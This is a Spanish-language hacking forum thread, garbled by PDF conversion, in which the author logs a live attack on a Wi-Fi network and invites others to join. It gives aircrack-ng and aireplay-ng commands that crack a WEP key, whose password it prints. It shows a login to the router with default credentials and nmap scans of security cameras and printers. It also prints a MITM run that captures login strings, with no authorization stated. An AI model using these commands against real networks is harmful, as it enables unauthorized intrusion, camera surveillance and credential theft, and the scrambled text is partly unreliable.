Diario de Un Ataque Hack

Inicio
Buscar
Ingresar
Registrarse
Noticias:
Normativa del foro: +info
Hack x C rack - C omunidad de Seguridad informtica Seguridad Informatica Hacking Diario de un Ataque
Pginas: [1] 2 3 4 5 6 7 8
Autor
I M P RI M I R
Ir Abajo
Tema: Diario de un Ataque (Ledo 28325 veces)
odeveku
Parte de la comunidad [L3]
Diario de un Ataque
en: Junio 21, 2012, 02:47:28 pm
PRLOGO
Mensajes: 197
open in browser PRO version
En vista a las respuestas obtenidas en este hilo

http://foro.hackxcrack.net/forum/index.php?topic=12351.0 se crea este
post en el que se va a analizar y diseccionar un ataque en tiempo real a
una red LAN. La idea es que toda la comunidad participe en el ataque
aportando sus ideas, conocimientos y mtodos para lograr primero
comprender y luego comprometer la seguridad de la red. Yo pondr en
prctica cada mtodo que propongis y postear el resultado con
Are you a developer? Try out the HTML to PDF API
pdfcrowd.com
capturas de pantalla etc. El objetivo es documentar y analizar en

profundidad el ataque y los mtodos empleados en l para que todos
podamos beneficiarnos y aprender de ello. Al lo!
ENTRANDO EN LA RED
Sabemos que la red LAN que queremos atacar dispone de un router WiFi con ESSID: WLAN_BE.
Este es el nico dato que tenemos por ahora, por lo que centramos
nuestro ataque en el AP de la red Wi-Fi con el objetivo de
autentificarnos como clientes legtimos de la red.
Corremos Backtrack.
Comenzamos con un monitoreo general de las redes a nuestro alcance
para localizar nuestro objetivo. Descubrimos que el AP est emitiendo en
el canal 6 y que su direccin MAC es E0:90:53:4A:68:AA. Adems
averiguamos que la contrasea tiene una encriptacin WEP.
Cdigo: [Se le ccionar]
airodump-ng wlan0
Monitoreamos el trfico de la red para capturar IVs que nos permitan

crackear la pass con aircrack-ng.
airodump-ng --bssid E0:90:53:4A:68:AA -c 6 -w wlan_be wlan0
Hacemos un ataque de falsa autenticacin y nos asociamos con el AP

para poder inyectar trfico.
aireplay-ng -1 0 -a E0:90:53:4A:68:AA -h 00:11:22:33:44:55 -e WLAN_BE wlan0
Comenzamos a analizar paquetes buscando aquellos que contengan
pdfcrowd.com
una peticin de ARP para poder reinyectarlos. Al reinyectarlos

provocamos que el AP tenga que emitir otro paquete ARP con un IV
nuevo que capturamos con el airodump-ng. Este proceso es un bucle
que se repite generando muchisimo trfico.
aireplay-ng -3 0 -b E0:90:53:4A:68:AA -h 00:11:22:33:44:55 wlan0
Como no encontramos ningn paquete de ARP que reinyectar, lanzamos

un ataque de desautenticacin a un cliente legtimo para que al volver a
autenticarse genere una peticin de ARP que podamos capturar y
reinyectar.
aireplay-ng -0 10 -a E0:90:53:4A:68:AA -c 9C:8E:99:33:4D:F0 wlan0
Crackeamos el password de la red mediante los IVs obtenidos que

hemos guardado en el wlan_be.cap.
aircrack-ng wlan_be.cap
Ya tenemos el password de la red: XE091534A27BE

Nos conectamos a ella como si furamos uno ms.
TANTEANDO EL TERRENO
Una vez que estamos dentro de la red, hacemos un "reconocimiento del
terreno" para saber ante que nos encontramos. Para ello vamos a
realizar un escaneo con el Nmap.
Primero ejecutamos el comando:
ifconfig
pdfcrowd.com
Esto nos sirve para saber que IP nos ha asignado el servidor DHCP, y
as poder deducir en que rango de IPs nos estamos moviendo.
Descubrimos que nuestra IP es 192.168.1.129 , por lo tanto sabemos
que seguramente el servidor DHCP asigne las IPs dentro del rango
192.168.1.1-255.
Para confirmarlo y hacernos una idea general del mapa de la LAN
realizamos un escaneo rpido con Nmap.
nmap -sP 192.168.1.1-255
La opcin -sP le indica al Nmap que simplemente compruebe si los hosts

estan up or down.
Resultado:
root@bt:~# nmap -sP 192.168.1.1-255
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 15:01 CEST
Nmap scan report for 192.168.1.1
Host is up (0.011s latency).
MAC Address: E0:91:53:4A:27:BE (XAVi Technologies)
MAC Address: 00:1B:11:01:30:95 (D-Link)
MAC Address: 00:13:46:DB:B7:5C (D-Link)
MAC Address: 00:13:46:DC:2D:60 (D-Link)
MAC Address: 00:1C:F0:78:81:83 (D-Link)
pdfcrowd.com
Descubrimos que hay 15 mquinas conectadas mediante la WLAN y

confirmamos nuestras sospechas de que el servidor DHCP asigna IPs en
el rango 192.168.1.1-255 . Esto ya nos permite esbozar un mapa ms o
menos aproximado de la red.
La ip 192.168.1.1 corresponde seguramente al AP, osea al router, que
parece ser un Xavii.
Vemos un rango de Ips 192.168.1.10-20 que corresponden a aparatos
D-Link lo que es bastante llamativo.
Vemos otras IPs correspondientes a varios hosts.
Y por ltimo vemos nuestra IP 192.168.1.129 que la descartamos del
anlisis.
Una vez que tenemos ms o menos claro por donde nos movemos...
vamos a ver que pasa con ese router.
EL ROUTER
En el escaneo anterior hemos visto que la IP del router era 192.168.1.1
.Esta vez vamos a realizar un escaneo ms a fondo, buscando puerto
abiertos, servicios, S.O... Para ello corremos el Nmap con los siguientes
parmetros:
root@bt:~# nmap -sV -A 192.168.1.1
Not shown: 994 closed ports
PORT
STATE SERVICE
VERSION
21/tcp
23/tcp
open
open
ftp
telnet
Xavi 7768 WAP ftpd 1.00

Zoom X6 ADSL router telnetd
53/tcp
open
tcpwrapped
80/tcp
open
2800/tcp open
upnp
upnp
Conexant-EmWeb 6.1.0 (UPnP 1.0)

pdfcrowd.com
8008/tcp open
upnp
MAC Address: E0:91:53:4A:27:BE (XAVi Technologies)

Device type: broadband router|WAP
Running: Allied Data embedded, Belkin embedded, Intracom embedded, Iskratel embedded
OS details: Broadband router (Allied Data CopperJet, Belkin F5D7632-4, Intracom Jetspeed 500i
Network Distance: 1 hop
Service Info: Devices: WAP, broadband router
Vemos que entre otras cosas en el campo del ftp el nmap nos dice que
seTRACEROUTE
trata del modelo Xavii 7768. Esto es una aproximacin y seguramente
noHOP
sea
RTTtotalmente
ADDRESScierto, pero nos sirve.
1
6.45 ms
Buscamos
la 192.168.1.1
documentacin del router Xavii 7768 en internet
http://www.adslayuda.com/xavi7768-cambiar_clave_acceso.html y
vemos que el usuario y el password por defecto del router son 1234 y
1234 respectivamente. Es muy probable que no los hayan cambiado as
que por probar que no quede.
Efectivamente no lo han cambiado. Ui, parece que alguien se ha dejado
la puerta abierta...
Comprobamos que como habamos supuesto antes no se trata del

modelo Xavii 7768, sino del 7968 plus.
Y de repente en la pestaa de redireccionamiento de puertos...
pdfcrowd.com
pdfcrowd.com
BANG! Acabamos de descubrir que eran todos esos aparatos D-Link.

Tenemos 9 cmaras con sus correspondientes IPs. Esto empieza a
ponerse interesante...
Adems sabemos que alguien se conecta a ellas desde el exterior de la
red, ya que no tendra sentido haber configurado un NAT si no vas a
acceder desde fuera del router.
Personalmente ODIO las interfaces http de los routers, me parece todo
una maraa de opciones y pestaas, as que vamos a conectarnos al
router por telnet para tener una consola con todas las opciones
ordenaditas en blanco sobre negro...
root@bt:~# telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
,vvvdP9P???^
vvd###P^`^
,,,
vvvvv v
vv#####?^
vv####??
v#####?
v#####?
######?
#####?
????####vv,
,vvvdP???^
,vvd##P?^
v###P^
,vvv,
####?^ ,vd#P?^
v####
,d##P^
######
v####
]###L
#####?
v####
]##L
,,,
??##^
#?#v#vvv
'?#?,
`???##
''
_
/
_
/ \
_
|\ |
|_
___
\/
/\
|\ |
pdfcrowd.com
######
####
]###L
?#####v
?#####
####v ]##h,
?###h, `9#hv,
\_
\_/
| \|
|_
/\
/--\
| \|
,,
,vv###
Vaya...
parece #####L
que se pueden
hacer ,v#v'
un par de cosas...
######
]###L
Pasemos
a las camaras!
?#####vv
?9##hv,
,,vvvv###'
?#####vv
`??9P\vv,
CAMARAS ######
vv##,
#######L
??###hvv,
`????9hdhvv,
,vvv#?##?????
Cuando intentamos acceder a alguna de las camaras por el puerto

designado en la tabla del NAT se abre una ventana como esta
Login: 1234
solicitandonos
un user y una pass.
Password: ****
Login successful
-->
802.1x
802.1x port based authentication
acl
snmp remote management
agent
Get a file from a remote host
ald
Configuration commands for ald
bridge
classifier
Configure layer 2 bridge

Packet classifier configuration commands
console
Console access
dhcpclient
DHCP client configuration commands
dhcpserver
DHCP server configuration commands
dnsclient
DNS client configuration commands
dnsrelay
emux
DNS relay configuration

Ethernet Switch Multiplex configuration commands
ethernet
Commands to configure ethernet transports
firewall
Firewall configuration commands
fullConeNat
Full Cone NAT configuration commands
help
Top level CLI help
igmp
igmp configuration commands
imdebug
ip
Directly access the information model

Configure IP router
Al no introducirla correctamente nos redirige a la siguiente pagina:
lan
logger
Log to a remote host using syslog
pdfcrowd.com
El siguiente paso es realizar un escaneo completo de las cmaras con

Nmap.
CAMARA 1 IP 192.168.1.12
Segn parece esta camara est offline, esto puede deberse a muchos
motivos, que se estropeara, que la quitaran por decisin propia... La
descartamos.
CAMARA 2 IP 192.168.1.13
Starting Nmap 5.61TEST4
PORT
STATE SERVICE VERSION
21/tcp
open
ftp
GNU Inetutils FTPd 1.4.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)

554/tcp
open
rtsp?
| rtsp-methods:
|_ OPTIONS, DESCRIBE, PLAY, SETUP, TEARDOWN
1501/tcp open sas-3?
MAC Address: 00:13:46:DB:B7:5C (D-Link)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:kernel:2.4
OS details: Linux 2.4.18 - 2.4.35 (likely embedded)
CAMARA
3 IP 192.168.1.14
Service Info: Host: Network-Camera
Cdigo:
[Se le ccionar]
TRACEROUTE
HOP RTT
ADDRESS
root@bt:~#
nmap
-sV -A 192.168.1.14
1
7.56 ms 192.168.1.13
pdfcrowd.com

PORT
21/tcp
open
ftp

23/tcp open
554/tcp open
telnet
rtsp?
Openwall GNU/*/Linux telnetd
| rtsp-methods:
|_
OPTIONS, DESCRIBE, PLAY, SETUP, TEARDOWN
MAC Address: 00:13:46:DC:2D:60 (D-Link)

OS details: Linux 2.4.18 - 2.4.35 (likely embedded)
CAMARA
4 IP 192.168.1.15
Service Info:
Host: Network-Camera; OS: Linux
Cdigo:
TRACEROUTE
[Se le ccionar]
HOP RTT
ADDRESS
root@bt:~# nmap -sV -A 192.168.1.15
1
281.05 ms 192.168.1.14
PORT
21/tcp
STATE SERVICE
open ftp
VERSION

23/tcp
open
telnet
554/tcp
open
rtsp?
Openwall GNU/*/Linux telnetd
| rtsp-methods:
|_
OPTIONS, DESCRIBE, PLAY, SETUP, TEARDOWN
1503/tcp open imtc-mcs?

MAC Address: 00:1C:F0:78:81:83 (D-Link)
CAMARA 5 IP 192.168.1.16
pdfcrowd.com
CAMARA 5 IP 192.168.1.16
root@bt:~# nmap -sV -A 192.168.1.16
PORT
21/tcp
STATE SERVICE
open ftp?
443/tcp open
VERSION
ssl/http GoAhead-Webs embedded httpd
| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW

| Not valid before: 2010-02-05 08:14:40
|_Not valid after:
2015-02-04 08:14:40
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)

| http-title: Document Error: Unauthorized
|_Requested resource was https://192.168.1.16:443/home.htm
MAC Address: F0:7D:68:05:A6:D0 (D-Link)
CAMARA
6 IP 192.168.1.17
OS details: Linux 2.6.13 - 2.6.31
Cdigo:
le ccionar]1 hop
Network[Se
Distance:
root@bt:~# nmap -sV -A 192.168.1.17
TRACEROUTE
HOP RTT Nmap 5.61TEST4
ADDRESS
Starting
1
271.54
ms
192.168.1.16
Nmap scan report
for 192.168.1.17
PORT
21/tcp
open
443/tcp open
ftp?

| Not valid before: 2010-02-05 08:14:40
|_Not valid after:
2015-02-04 08:14:40
pdfcrowd.com

MAC Address: F0:7D:68:0A:87:5A (D-Link)
CAMARA
7 IP 192.168.1.18
Cdigo:
le ccionar]1 hop
Network[Se
Distance:
nmap -sV -A 192.168.1.18
TRACEROUTE
HOP
RTT Nmap ADDRESS
Starting
5.61TEST4 ( http://nmap.org )
1
336.91
ms 192.168.1.17
Nmap
scan report
for 192.168.1.18
PORT
21/tcp
open
443/tcp open
ftp?

| Not valid before: 2010-02-05 08:14:40
|_Not valid after: 2015-02-04 08:14:40

|_http-title: Requested resource was https://192.168.1.18:443/home.htm and no page was return
MAC Address: F0:7D:68:0A:87:49 (D-Link)
CAMARA
8 IP 192.168.1.19
Cdigo:
[Se le ccionar]
TRACEROUTE
HOP
RTT
ADDRESS
root@bt:~#
nmap
-sV -A 192.168.1.19
1
338.75 ms 192.168.1.18
PORT
STATE SERVICE
21/tcp
open
VERSION
ftp?
pdfcrowd.com
443/tcp open

| Not valid before: 2010-02-05 08:14:40
|_Not valid after: 2015-02-04 08:14:40
MAC Address: F0:7D:68:0A:86:C8 (D-Link)
CAMARA
9 IP 192.168.1.20
Cdigo:
le ccionar]1 hop
Network[Se
Distance:
root@bt:~# nmap -sV -A 192.168.1.20
TRACEROUTE
HOP RTT Nmap 5.61TEST4
ADDRESS
Starting
1
655.43
ms
192.168.1.19
Nmap scan report
for 192.168.1.20
PORT
STATE SERVICE
21/tcp
open
443/tcp open
VERSION
ftp?

| Not valid before: 2010-02-05 08:14:40
|_Not valid after: 2015-02-04 08:14:40
MAC Address: F0:7D:68:0A:85:4B (D-Link)
Una
vez escaneadas las camaras escaneamos el resto de IPs para
hacernos
unaLinux
idea 2.6.13
de que- otros
OS details:
2.6.31equipos hay en la WLAN.
192.168.1.33 IMPRESORA HP
TRACEROUTE
HOP RTT[Se le ccionar]
ADDRESS
Cdigo:
1
360.67 ms 192.168.1.20
pdfcrowd.com
root@bt:~# nmap -sV -A 192.168.1.33

PORT
STATE SERVICE
VERSION
80/tcp
open
Virata-EmWeb 6.2.1
http
|_http-title: HP Photosmart Wireless B109n-z

139/tcp
445/tcp
open
open
tcpwrapped
netbios-ssn
6839/tcp open
tcpwrapped
7435/tcp open
tcpwrapped
8080/tcp open
http-proxy?

9100/tcp open
9101/tcp open
jetdirect?
jetdirect?
9102/tcp open
jetdirect?
192.168.1.34
PC
9110/tcp open unknown
9220/tcp open hp-gsg
Cdigo:
[Seopen
le ccionar]
9290/tcp
hp-gsg
HP Generic Scan Gateway 1.0

IEEE 1284.4 scan peripheral gateway
9500/tcp
open
root@bt:~#
nmapismserver?
-sV -A 192.168.1.34
MAC Address: F4:CE:46:EE:2C:E2 (Hewlett-Packard Company)
Device type:
Starting
Nmapprinter
5.61TEST4
Running:
HP
embedded
OS
details:
HP PhotoSmart
C390 or C4780, or Officejet 7000 printer, HP printer: Photosmart 43
Host
is up (0.0029s
latency).
Network
Distance:
1 hop ports
Not shown:
990 filtered
Service Info:
printerVERSION
PORT
STATEDevice:
SERVICE
21/tcp
open
tcpwrapped
Host
script
results:
139/tcp open
netbios-ssn
|_nbstat:
NetBIOS
name: HPF4CE46EE2CE2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
427/tcp closed
svrloc
445/tcp open
TRACEROUTE
700/tcp open
microsoft-ds Microsoft Windows XP microsoft-ds
6000/tcp open
X11?
8000/tcp open
http-alt?
8001/tcp open
vcom-tunnel?
tcpwrapped
HOP
RTT
ADDRESS
1073/tcp open
tcpwrapped
1
4.55
ms
192.168.1.33
2869/tcp open
http
Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
pdfcrowd.com
192.168.1.36 IMPRESORA HP
root@bt:~# nmap -sV -A 192.168.1.36
PORT
STATE SERVICE
80/tcp
open
VERSION
http?
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

139/tcp
open
tcpwrapped
445/tcp
open
netbios-ssn
631/tcp open ipp?

6839/tcp open
tcpwrapped
7435/tcp open
tcpwrapped
8080/tcp open
http-proxy?
9100/tcp open
jetdirect?
9101/tcp open
jetdirect?
9110/tcp open
unknown
9220/tcp open
hp-gsg
192.168.1.38
9102/tcp open jetdirect?
Esta
IP noopen
tengoDragonIDSConsole?
ni la ms mnima idea de a que podra pertenecer.
9111/tcp
HP Generic Scan Gateway 1.0
9290/tcp
hp-gsg
IEEE 1284.4 scan peripheral gateway
Cdigo:
[Seopen
le ccionar]
9500/tcp open ismserver?
nmap -sV -A 192.168.1.38
MAC Address: 9C:8E:99:33:4D:F0 (Hewlett-Packard Company)
Device type: printer|power-device

Running: HP embedded, HP VxWorks, MGE embedded
OS CPE: cpe:/o:hp:vxworks
OS details: HP LaserJet CM1312 or Photosmart C510a printer, VxWorks: HP printer or MGE MX 500
Not shown: 998 filtered ports
PORT
Service Info: Device: printer
2869/tcp closed icslap
2968/tcp open
enpp?
Host script results:
pdfcrowd.com
MAC Address: 00:1F:1F:48:55:80 (Edimax Technology Co.)

Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows XP|98|2000|NT|2003|PocketPC/CE (94%), HTC Windows
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_98 cpe:/o:htc:windows_ce cp
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows 98 SE (92%), Microso
No exact OS matches for host (test conditions non-ideal).
TRACEROUTE
Observamos
que
la MAC del host pertenece a Edimax Technology Co.
HOP RTT
ADDRESS
http://www.edimax.es/es/index.php
Basta una bsqueda en internet
1
486.83 ms 192.168.1.38
para averiguar que es una empresa que se dedica a la fabricacin de
dispositivos Wireless, entre ellos cmaras Wireless. Ser otra cmara?
IP 192.168.1.10 OTRO ROUTER?
nmap -sV -A 192.168.1.10
PORT
STATE SERVICE
22/tcp
open
tcpwrapped
23/tcp
open
telnet
80/tcp
open
tcpwrapped
443/tcp open
tcpwrapped
VERSION
D-Link Access Point telnetd
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=HsinChu/co

| Not valid before: 2004-07-12 09:02:20
|_Not valid after: 2024-07-12 09:02:20
| http-methods: Potentially risky methods: PUT
|_See http://nmap.org/nsedoc/scripts/http-methods.html
MAC Address: 00:1B:11:01:30:95 (D-Link)
OS details: WAP (Cisco Aironet 1010, D-Link DWL-2100AP or DWL-3200AP, Linksys WAP51AB or WAP5
Los
resultados
que1 obtenemos
para esta IP son bastante interesantes,
Network
Distance:
hop
yaService
que segn
parace
Info: Nmap
Device:
routerque nos encontramos frente a otro router.
los esquemas que nos habamos hecho en un principio
Are you a developer? TryEsto
out the rompera
HTML to PDF API
pdfcrowd.com
Esto rompera los esquemas que nos habamos hecho en un principio

sobre la composicin de la red.
ETHERAPE
Para entender mejor como funciona la red y que hosts se comunican
entre s ejecutamos el Etherape.
Etherape es un programa que bsicamente sirve para mapear el
recorrido que siguen las comunicaciones en la red para as poder
hacernos una idea de la estructura de la misma.
Esto es lo que obtenemos tras un rato ejecutando etherape:
Como se puede ver parece que la IP 239.255.255.250 se comunica

constantemente con las IPs de las camaras de seguridad. Esto llama la
atencin, primero porque en nuestro primer escaneo con Nmap no
habamos detectado ese host, lo que hace pensar que se trata de un
host externo a la red (ms adelante veremos que esto no es as).
Ejecutamos Nmap para intentar escanearlo.
root@bt:~# nmap 239.255.255.250
pdfcrowd.com
root@bt:~# nmap 239.255.255.250

Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 0.44 seconds
Efectivamente nos da como resultado host down.

Probamos con algo diferente, vamos a realizar un ping a la IP mientras
corremos el Etherape para mapear el recorrido de los paquetes.
Esto es lo que obtenemos con Etherape+Ping:
pdfcrowd.com
pdfcrowd.com
pdfcrowd.com
pdfcrowd.com
pdfcrowd.com
pdfcrowd.com
IP 239.255.255.250 MULTIDIFUSIN UPnP

Como podemos ver, nosotros estamos mandando paquetes solamente a
la IP 239.255.255.250 pero recibimos paquetes de respuesta de las IPs
192.168.1.1 192.168.1.13 192.168.1.14 192.168.1.15 . Esto significa
que la IP 239.255.255.250 reenva nuestros "paquetes de ping" a esas
IPs, como puede verse en el mapeado de Etherape. Otro dato
interesante es que en algunos paquetes aparece "DUP!", esto quiere
decir que el paquete est duplicado, lo que nos indica que nos llegan
varias respuestas iguales desde diferentes direcciones, osea, que el
pdfcrowd.com
paquete que les llega a todos los hosts es el mismo paquete que
nosotros envamos a 239.255.255.250, por eso nos llegan respuestas
repetidas.
Si investigamos un poco en internet http://sanmaikelnews.comze.com/?
p=66, descubrimos que la ip 239.255.255.250 es una direccin de
multidifusin utilizada por el protocolo UPnP. Los dispositivos que
ofrecen servicios UPnP envian peridicamente NOTIFICACIONES SSDP
al 239.255.255.250:1900, anunciandose a los clientes que estn
escuchando. Una NOTIFICACION SSDP contiene una cabecera de
Localizacin donde especifica la ubicacin de un archivo XML. Este
archivo XML contiene datos que indican, entre otras cosas, el tipo (s) de
dispositivo UPnP y los servicios soportados por el host, as como rutas
adicionales a otros documentos XML que describen los diversos
servicios en detalle. Del mismo modo, los clientes UPnP pueden enviar
requerimientos SSDP M-SEARCH al 239.255.255.250:1900 para ver si
alguno de los dispositivos UPnP responde.
MIRANDA
Auditar dispositivos UPnP de manera manual es un proceso que requiere
mucho tiempo y dedicacin. Miranda es un script escrito en python que
nos permite automatizar y acelerar considerablemente todo este
proceso.
Su localizacin en la suite de backtrack es:
/pentest/enumeration/miranda
Corremos el script miranda.py

Lo primero que necesitamos es encontrar los hosts UPnP que existen en
nuestra red:
pdfcrowd.com

upnp> msearch
Entering discovery mode for 'upnp:rootdevice', Ctl+C to stop...
****************************************************************
SSDP reply message from 192.168.1.17:8838
XML file is located at http://192.168.1.17:8838/rootdesc.xml
Device is running Cellvision UPnP/1.0
****************************************************************
****************************************************************
Device is running Cellvision UPnP/1.0
****************************************************************
****************************************************************
Despus
listamos los hosts descubiertos:
Cdigo:
ccionar]Cellvision UPnP/1.0
Device [Se
is le
running
****************************************************************
upnp> host list
****************************************************************
[0] 192.168.1.17:8838
SSDP reply
from 192.168.1.19:8838
[1]message
192.168.1.16:8156
XML file[2]
is located
at http://192.168.1.19:8838/rootdesc.xml
192.168.1.20:8838
Device is
running
Cellvision UPnP/1.0
[3]
192.168.1.19:8838
****************************************************************
[4] 192.168.1.1:2800
[5] 192.168.1.15:11993
****************************************************************
[6] 192.168.1.18:8838
SSDP reply
from 192.168.1.1:2800
[7]message
192.168.1.13:10242
XML file[8]
is located
at http://192.168.1.1:2800/WFADevice.xml
192.168.1.14:10242
Device is running Unknown/0.0 UPnP/1.0 Conexant-EmWeb/R6_1_0
****************************************************************
Nos damos cuenta de que son todas las cmaras + el router

-------------CAPITULO EN CONSTRUCCIN -------------------****************************************************************
Are you a developer? TryMITM

out the HTML to PDF API
pdfcrowd.com
MITM
Para ejecutar el ataque MITM vamos a utilizar YAMAS, un script que
permite automatizar considerablemente el proceso del ataque.
Para el primer ataque vamos a seleccionar como objetivo toda la red y
vamos a redirigir el trafco de los puertos 80 a ver que encontramos.
root@bt:~# yamas
No update available
Script is installed
`YMM'
`MM'
db
VMA
,V
VMA ,V
VMMP
MM
MM
`7MMM.
;MM:
,V^MM.
,M
`MM
AbmmmqMA
A'
.JMML..AMA.
VML
,MMF'
MMMb
M YM
dPMM
,M MM
Mb
M' MM
YM.P'
MM
`YM'
MM
.AMMA..JML. `'
db
.M"""bgd
;MM:
,V^MM.
,M
`MM
AbmmmqMA
A'
.JMML..AMA.
,MI
`MMb.
VML
"Y
`YMMNq.
.
Mb
`MM
dM
.AMMA.P"Ybmmd"
===========================================================================
=
Welcome to Yet Another MITM Automation Script.
Use this tool responsibly, and enjoy!
Feel free to contribute and distribute this script as you please. =
Official thread : http://tinyurl.com/yamas-bt5
Aqu
estCheck
el resultado
de este primer ataque:
=
out the help (-h) to see new features and informations
Cdigo:
[Se
le ccionar]
=
You
are running version 20120213
=
=
=
===========================================================================
Website
=
prov.eu.mydlink.com):
Message
of
the
day
:
Login =
tfQmw7Lw5EAzo1LgDdUkp1vyZCx6XRXyMvi6TA6o7PW5UPCp4Yf5D54cSTQ6xdbpgYT6FsJoqYQdR
Reviewing
someprov.eu.mydlink.com):
code...
Website
=
Could =
someone send
me a complete log file? I'm planning on making a better parsing.
Login
Pw2eMpFln89k4cF6Tcpo6m/6ItsmWvNsMpdlSdj5xyGoQyB6yvhoXjzeFzpvs5+6d6HvrAFibT2tH
On another
I today had the privilege to witness that Yamas works against Youporn mobile
Website
= note,prov.eu.mydlink.com):
Login =
4cr6n8hci/evlGheWlo7kGHsQKBmA+ssKu1mUJ938VzjTVa83XNjWfPwCZrmvlR8yXlmEkp3zXrtV
Please make
sureprov.eu.mydlink.com):
to check out my last project : http://msimdb.comax.fr
Website
=
pdfcrowd.com
Login =
QkjpNasdssmsvjsxWj/rbvpxQoFqTmakXyVdY32f3pwrIpqxim0rMcanYolwZsqmTjewmw9odpr3c
Website =
Login =
+en3Kneyp7ht6feaRUwi5f/wHnOoG4mwO9Ro0kF6nbpp9bl5hePpRGNsFrnorU15aeaoSJz6benvD
Website =
-------------- CAPITULO EN CONSTRUCCIN -------------------METASPLOIT

-------------- CAPITULO EN CONSTRUCCIN ------------------- ltima modificacin: Junio 25, 2012, 05:05:03 pm por odeveku
En lnea
Todo hombre sabio teme

tres cosas: la tormenta en el mar, la noche
sin luna y la ira de un hombre amable.
Re:Diario de un Ataque
djtux
Ladrn de espacio en la BD [L0]
Mensajes: 6
Respuesta #1 en: Junio 21, 2012,

07:50:25 pm
muy buen aporte de hecho muy interesante pero tengo una pregunta
habr alguna manera de correr backtrack desde mac os x?
pdfcrowd.com
En lnea
DaVid...
odeveku

07:56:42 pm
Mensajes: 197
S, la hay. http://bit.ly/LjhPps
De todas formas, si quieres preguntar algo que no tiene nada que ver
con mi post, lo mejor es crear un post nuevo.
ltima modificacin: Junio 21, 2012, 07:59:00 pm por odeveku
En lnea

kid_goth
ste es mi foro! [L6]
08:33:33 pm
pdfcrowd.com
ta gueno xD... Saludos

En lnea
C uando la percepcin de vida que tienes encuentra en si que la muerte es
inevitable y lo aceptas con humildad y agrado, es cuando realmente empiezas a
amar la vida y adorar la muerte.
Mensajes: 1356
El Conocimiento se Limita Cuando
dices NO PUEDO
JAG

08:49:04 pm
Que bueno tio... me gusta la labor que estas realizando...

En lnea
Mensajes: 1564
pdfcrowd.com
miyamoto340
Visitante
08:59:24 pm
Muy buen aporte, esperar a ver como sigues xD

En lnea
ACK

09:15:45 pm
Excelente trabajo! Esto se pone interesante muajaja

Saludos familia
En lnea
Mensajes: 1603
La piratera es un crimen. No
ataque barcos.
D16174L_MURD3R
Ladrn de espacio en la BD [L0]
Mensajes: 8
El guerrero de la luz a veces acta como el agua, y

fuye entre los obstculos que encuentra. En ciertos
momentos, resistir signifca ser destruido; entonces,
l se adapta a las circunstancias.
En esto reside la fuerza del agua. Jams puede ser
quebrada por un martillo, ni herida por un cuchillo. La
ms poderosa espada del mundo es incapaz de dejar una
cicatriz sobre su superfcie.
Paulo C oelho
09:37:23 pm
Muy interesante el post!, ya haca tiempo que no entraba al foro.

Saludos!.
En lnea
pdfcrowd.com
En lnea
"...And the machines will the take control"
coco

09:46:42 pm
Mensajes: 1130
buen trabajo esperemos el desenlase saludos.
la informacion es libre
En lnea
Durmete nio, durmete ya
Que viene el C oco y te comer.
https://www.youtube.com/user/matrixHXC /videos
odeveku
Mensajes: 197
10:50:15 pm
Bueno brodels, con esto yo creo que podemos dar por concluida la 1
fase del post. Recordad que el objetivo del post es llevar a cabo un
ataque conjunto donde toda la comunidad participe. Ya tenemos un
escenario ms o menos claro. Hay escaneos de todos los hosts con
puertos abiertos, servicios, un mapeado ms o menos claro de la red
(evidentemente todava hay que avanzarlo ms), hay una lista de todos
los comandos que acepta el router por telnet... Tenis todo lo necesario
para dejar de relameros los dientes y empezar a pegar bocados, as que
a partir de ahora... SE ABRE LA VEDA!!
Podis empezar a plantear ideas, posibles ataques, mtodos de
escaneo y mapeado alternativos... Podis pedirme que os proporcione
otros datos en concreto... LO QUE SEA!!!
pdfcrowd.com
Afilad los cuchillos HackXCrack... nos vamos de caza!

PD: Proximamente publicar un escaneo de vulnerabilidades con
metasploit.
ltima modificacin: Junio 22, 2012, 02:00:02 pm por odeveku
En lnea

Pginas: [1] 2 3 4 5 6 7 8
Ir Arriba
I M P RI M I R
Hack x C rack - C omunidad de Seguridad informtica Seguridad Informatica Hacking Diario de un Ataque
Ir a: => Hacking
ir
pdfcrowd.com
SMF | SMF 2013, Sim ple Machine s

XHTML R SS W AP2
pdfcrowd.com

Diario de Un Ataque Hack

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Diario de Un Ataque Hack

Загружено:

Авторское право:

Доступные форматы

Inicio

Tema: Diario de un Ataque (Ledo 28325 veces)

open in browser PRO version

En vista a las respuestas obtenidas en este hilo

capturas de pantalla etc. El objetivo es documentar y analizar en

Monitoreamos el trfico de la red para capturar IVs que nos permitan

Hacemos un ataque de falsa autenticacin y nos asociamos con el AP

Comenzamos a analizar paquetes buscando aquellos que contengan

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

una peticin de ARP para poder reinyectarlos. Al reinyectarlos

Como no encontramos ningn paquete de ARP que reinyectar, lanzamos

Crackeamos el password de la red mediante los IVs obtenidos que

Ya tenemos el password de la red: XE091534A27BE

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

La opcin -sP le indica al Nmap que simplemente compruebe si los hosts

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

Descubrimos que hay 15 mquinas conectadas mediante la WLAN y

Xavi 7768 WAP ftpd 1.00

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

Conexant-EmWeb 6.1.0 (UPnP 1.0)

Conexant-EmWeb 6.1.0 (UPnP 1.0)

MAC Address: E0:91:53:4A:27:BE (XAVi Technologies)

Comprobamos que como habamos supuesto antes no se trata del

open in browser PRO version

Are you a developer? Try out the HTML to PDF API

open in browser PRO version

